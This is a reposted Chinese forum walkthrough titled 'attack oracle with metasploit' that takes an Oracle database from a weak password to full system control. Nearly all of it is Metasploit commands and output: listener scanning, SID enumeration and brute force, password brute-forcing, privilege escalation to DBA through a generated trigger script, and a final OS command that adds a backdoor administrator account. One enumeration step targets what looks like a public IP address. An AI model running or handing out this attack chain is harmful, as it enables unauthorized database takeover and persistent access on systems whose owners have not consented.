attack oracle with metasploit
来源:http://www.milsec.net/viewtopic.php?id=42
Topic: attack oracle with metasploit有个oracle弱口令。就能搞定目标。当然这个弱口令帐户要有resource权限。
1.查询tns版本.用nmap5也可以
msf > use auxiliary/scanner/oracle/tnslsnr_version
msf auxiliary(tnslsnr_version) > set RHOSTS 192.168.1.10
RHOSTS => 192.168.1.10
msf auxiliary(tnslsnr_version) > run
[\] Host 192.168.1.10 is running: 32-bit Windows: Version 10.1.0.2.0 – Production
[\] Auxiliary module execution completed
mickey@pentest:~$ sudo nmap -sV -p1521 192.168.1.10
[sudo] password for mickey:
Starting Nmap 5.00 ( http://nmap.org ) at 2009-07-30 00:53 CST
Interesting ports on localhost (192.168.1.10):
PORT STATE SERVICE VERSION
1521/tcp open oracle-tns Oracle TNS Listener 10.1.0.2.0 (for 32-bit Windows)
MAC Address: 00:0C:29:49:E7:AE (VMware)
Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.44 seconds
2.sid查询,如果是oracle9.2.0.8以上,无法查询,只能猜测或者暴力破解
msf > use auxiliary/scanner/oracle/sid_enum
msf auxiliary(sid_enum) > set RHOSTS 222.231.61.55
RHOSTS => 222.231.61.55
msf auxiliary(sid_enum) > run
[\] Identified SID for 222.231.61.55: CANKIDS
[\] Identified SERVICE_NAME for 222.231.61.55: CANKIDS
[\] Auxiliary module execution completed
3.通过Oracle XML来列举SID (8080端口)
msf > use auxiliary/scanner/oracle/xdb_sid
msf auxiliary(xdb_sid) > set DBUSER sys
DBUSER => sys
msf auxiliary(xdb_sid) > set DBPASS mickey
DBPASS => mickey
msf auxiliary(xdb_sid) > set RHOSTS 192.168.1.10
RHOSTS => 192.168.1.10
msf auxiliary(xdb_sid) > run
[\] Discovered SID: ‘ORCL’ for host 192.168.1.10
[\] Auxiliary module execution completed
msf auxiliary(xdb_sid) >
4.通过企业管理控制台得到sid (1158端口)
msf > use auxiliary/scanner/oracle/emc_sid
msf auxiliary(emc_sid) > set RHOSTS 192.168.1.10
RHOSTS => 192.168.1.10
msf auxiliary(emc_sid) > run
[\] Discovered SID: ‘mickey’ for host 192.168.1.20
[\] Auxiliary module execution completed
5.sid暴力破解
msf > use auxiliary/admin/oracle/sid_brute
msf auxiliary(sid_brute) > set RHOST 192.168.1.10
RHOST => 192.168.1.10
msf auxiliary(sid_brute) > run
[\] Starting brute force on 192.168.1.10, using sids from /home/mickey/Pentest/exploit/framework-3.2/msf3/data/wordlists/sid.txt…
[\] Found SID ‘PLSExtProc’ for host 192.168.1.10.
[\] Found SID ‘ORCL’ for host 192.168.1.10.
[\] Auxiliary module execution completed
6.破解登录帐号
msf > use auxiliary/admin/oracle/login_brute
msf auxiliary(login_brute) > set RHOST 192.168.1.10
RHOST => 192.168.1.10
msf auxiliary(login_brute) > set SID ORCL
SID => ORCL
msf auxiliary(login_brute) > run
[-] The dbi module is not available!
[-] The dbi module is not available!
如果是以上的提示,则参考https://metasploit.com/trac/wiki/OracleUsage
msf auxiliary(login_brute) > run
[-] ORA-01017: invalid username/password; logon denied
[-] ORA-01017: invalid username/password; logon denied
[-] ORA-01017: invalid username/password; logon denied
[-] ORA-01017: invalid username/password; logon denied
[-] ORA-01017: invalid username/password; logon denied
[-] ORA-01017: invalid username/password; logon denied
[\] Found user/pass of: SCOTT/TIGER on 192.168.1.10 with sid ORCL
[-] ORA-28000: the account is locked
[-] ORA-28000: the account is locked
[-] ORA-28000: the account is locked
[-] ORA-28000: the account is locked
[\] Auxiliary module execution completed
破解的结果可以在framework-3.2/msf3/data/wordlists查看
mickey@pentest:~/Pentest/exploit/framework-3.2/msf3/data/wordlists$ cat oracle_default_found.log
Found user/pass of: SCOTT/TIGER on 192.168.1.10 with sid ORCL.
7.执行sql语句
msf > use auxiliary/admin/oracle/sql
msf auxiliary(sql) > set RHOST 192.168.1.10
RHOST => 192.168.1.10
msf auxiliary(sql) > run
[\] Sending statement: ‘select * from v$version’…
[\] Oracle Database 10g Enterprise Edition Release 10.1.0.2.0 – Prod
[\] PL/SQL Release 10.1.0.2.0 – Production
[\] CORE 10.1.0.2.0 Production
[\] TNS for 32-bit Windows: Version 10.1.0.2.0 – Production
[\] NLSRTL Version 10.1.0.2.0 – Production
[\] Done…
[\] Auxiliary module execution completed
msf auxiliary(sql) > set SQL “select * from user_role_privs”
SQL => select * from user_role_privs
msf auxiliary(sql) > run
[\] Sending statement: ‘select * from user_role_privs’…
[\] SCOTT,CONNECT,NO,YES,NO
[\] SCOTT,RESOURCE,NO,YES,NO
[\] Done…
[\] Auxiliary module execution completed
msf auxiliary(sql) >
8.提升权限
msf > use auxiliary/admin/oracle/droptable_trigger
msf auxiliary(droptable_trigger) > run
[\] Creating ‘msf.sql’ file …
[\] Generated output file /home/mickey/Pentest/exploit/framework-3.2/msf3/data/exploits/msf.sql
[\] Auxiliary module execution completed
利用导出的msf.sql,提权
mickey@pentest:~/Pentest/exploit/framework-3.2/msf3/data/exploits$ sqlplus scott/tiger@192.168.1.10/orcl <msf.sql
断开后,再连接,就是dba权限了,然后赋予javasyspriv权限
mickey@pentest:~/Pentest/exploit/framework-3.2/msf3/data/exploits$ sqlplus scott/tiger@192.168.1.10/orcl
SQL*Plus: Release 10.2.0.4.0 – Production on Thu Jul 30 04:40:31 2009
Copyright (c) 1982, 2007, Oracle. All Rights Reserved.
Connected to:
Oracle Database 10g Enterprise Edition Release 10.1.0.2.0 – Production
With the Partitioning, OLAP and Data Mining options
SQL> grant javasyspriv to scott;
Grant succeeded.
SQL> select * from user_role_privs;
USERNAME GRANTED_ROLE ADM DEF OS_
—————————— —————————— — — —
SCOTT CONNECT NO YES NO
SCOTT DBA NO YES NO
SCOTT JAVASYSPRIV NO YES NO
SCOTT RESOURCE NO YES NO
9.执行系统命令
msf > use auxiliary/admin/oracle/post_exploitation/win32exec
msf auxiliary(win32exec) > set RHOST 192.168.1.10
RHOST => 192.168.1.10
msf auxiliary(win32exec) > set CMD “net user pt007 shad@w /add && net localgroup administrators pt007 /add”
CMD => net user pt007 shad@w /add && net localgroup administrators pt007 /add
msf auxiliary(win32exec) > run
[\] Creating java source ‘VDBOOEEQ’…
[\] Done…
[\] Creating procedure ‘KIXWXLFQ’…
[\] Done…
[\] Sending command: ‘net user pt007 shad@w /add && net localgroup administrators pt007 /add’
[\] Done…
[\] Removing java source ‘VDBOOEEQ’…
[\] Done…
[\] Removing procedure ‘KIXWXLFQ’…
[\] Done…
[\] Auxiliary module execution completed
msf auxiliary(win32exec) >